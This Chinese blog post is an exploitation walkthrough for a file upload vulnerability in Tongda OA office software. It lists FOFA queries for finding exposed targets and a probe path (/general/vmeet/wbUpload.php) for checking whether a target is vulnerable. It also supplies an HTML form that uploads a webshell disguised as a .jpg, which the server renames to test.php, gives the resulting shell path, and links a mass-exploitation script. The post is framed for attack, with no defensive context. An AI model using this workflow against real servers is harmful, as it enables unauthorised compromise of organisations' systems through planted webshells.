美文网首页
通达OA文件上传漏洞

通达OA文件上传漏洞

作者: q1ya | 来源:发表于2019-10-23 13:33 被阅读0次

    0x01 fofa收集目标

    title="网络智能办公管理系统"
    app="通达OA"

    0x02测试是否存在上传漏洞

    访问[ip地址:端口]/general/vmeet/wbUpload.php
    响应200,则可能存在漏洞

    0x03通过脚本上传shell

    脚本内容

    <form enctype="multipart/form-data" action="ip+端口/general/vmeet/wbUpload.php?fileName=test.php+" method="post">
    
    <input type="file" name="Filedata" size="50"><br>
    
    <input type="submit" value="Upload">
    
    </form>
    

    以ma.jpg形式上传,上传后自动帮你重命名为test.php
    上传成功后webshell路径为
    ip+端口/general/vmeet/wbUpload/test.php

    0x04编写批量脚本

    链接
    https://github.com/qiya7/daily-code/blob/master/fofa_tongdaOA.py

    相关文章

      网友评论

          本文标题:通达OA文件上传漏洞

          本文链接:https://www.haomeiwen.com/subject/cmdcpctx.html